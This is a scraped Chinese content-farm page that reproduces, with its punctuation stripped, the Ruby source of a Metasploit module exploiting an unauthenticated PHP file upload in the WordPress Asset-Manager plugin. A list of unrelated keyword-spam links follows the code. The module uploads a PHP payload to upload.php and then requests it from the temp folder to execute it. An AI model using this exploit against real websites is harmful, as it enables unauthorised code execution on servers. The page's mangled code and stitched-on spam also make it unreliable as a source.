当前位置: 首页 > news >正文

精彩的网格布局网站北京公司注册官网

精彩的网格布局网站,北京公司注册官网,携程网网站规划建设特点,wordpress小程序二开这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。### This file is part of the Metasploit Framework and may be subject to# redistrib…这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.#   http://metasploit.com/framework/##require msf/corerequire msf/core/exploit/php_execlass Metasploit3 Msf::Exploit::RemoteRank ExcellentRankinginclude Msf::Exploit::Remote::HttpClientinclude Msf::Exploit::PhpEXEdef initialize(info {})super(update_info(info,Name           WordPress Asset-Manager PHP File Upload Vulnerability,Description    %q{This module exploits a vulnerability found in Asset-Manager 2.0  WordPressplugin.  By abusing the upload.php file, a malicious user can upload a file to atemp directory without authentication, which results in arbitrary code execution.},Author         [Sammy FORGIT, # initial discoveryJames Fitts # metasploit module],License        MSF_LICENSE,References     [[ OSVDB, 82653 ],[ BID, 53809 ],[ EDB, 18993 ],[ URL, http://www.hack1990.com/ ]],Payload       {BadChars \x00,},Platform       php,Arch           ARCH_PHP,Targets        [[ Generic (PHP Payload), { Arch ARCH_PHP, Platform php } ],[ Linux x86, { Arch ARCH_X86, Platform linux } ]],DefaultTarget 0,DisclosureDate May 26 2012))register_options([OptString.new(TARGETURI, [true, The full URI path to WordPress, /wordpress])], self.class)enddef exploituri   target_uri.pathuri / if uri[-1,1] ! /peer #{rhost}:#{rport}payload_name #{rand_text_alpha(5)}.phpphp_payload get_write_exec_payload(:unlink_selftrue)data Rex::MIME::Message.newdata.add_part(php_payload, application/octet-stream, nil, form-data; name\Filedata\; filename\#{payload_name}\)post_data data.to_s.gsub(/^\r\n\-\-\_Part\_/, --_Part_)print_status(#{peer} - Uploading payload #{payload_name})res send_request_cgi({method  POST,uri     #{uri}wp-content/plugins/asset-manager/upload.php,ctype   multipart/form-data; boundary#{data.bound},data    post_data})if not res or res.code ! 200 or res.body !~ /#{payload_name}/fail_with(Exploit::Failure::UnexpectedReply, #{peer} - Upload failed)endprint_status(#{peer} - Executing payload #{payload_name})res send_request_raw({uri     #{uri}wp-content/uploads/assets/temp/#{payload_name},method  GET})if res and res.code ! 200fail_with(Exploit::Failure::UnexpectedReply, #{peer} - Execution failed)endendend
http://www.yutouwan.com/news/273692/

相关文章:

  • 西安做网站公司怎么样pc网站建设和推广
  • 品牌网站建设哪好设计师网页设计
  • 建设公司网站需要多少钱1sose wordpress
  • 山东省住房城乡建设厅网站那个网站做h5不要钱
  • 做网站怎么对接国际收款商户网站上如何做电子手册
  • 国外建筑设计网站推荐外贸人常用的网站
  • 专业网站搭建运营网站开发什么语言
  • asp.net网站开发简介开发小程序用什么软件写代码
  • 12306铁路网站开发语言合肥网页设计工资一般多少
  • 免费个人微网站模板网页前端是什么工作
  • 最新网站开发价格建网站怎么分类
  • 网站建设1000字做老师好还是网站编辑好
  • 贵阳网站建设 网站制作百度域名注册官网
  • 做啊网站太原建设设计公司网站
  • 德州做网站建设的公司哪家好哪些网站可以做翻译兼职
  • 公司注销后 网站备案吗网络管理系统功能
  • 网站建设价表模板湖南百度推广代理商
  • 摄影网站设计方案网站建设需准备什么
  • 印江建设局网站西宁企业做网站
  • 做网站网站制作签名在线生成器
  • 织梦网站首页模板路径设计方案万能模板
  • 网站建设与运营推广的回报材料最好的装饰公司营销型网站
  • 做网站 英语四川建网站
  • 百度教育网站服装logo设计
  • 中国会议营销网站做视频网站怎么看不会卡
  • 深圳福田网站制作公司wordpress 微博登录注册
  • 域名注册平台的网站怎么做实时开奖走势网站建设
  • 网站设计定制多少钱wordpress音乐播放插件
  • 网站样式用什么做的wordpress目录下
  • 静态网站建设的主要技术网络营销方法的典型案例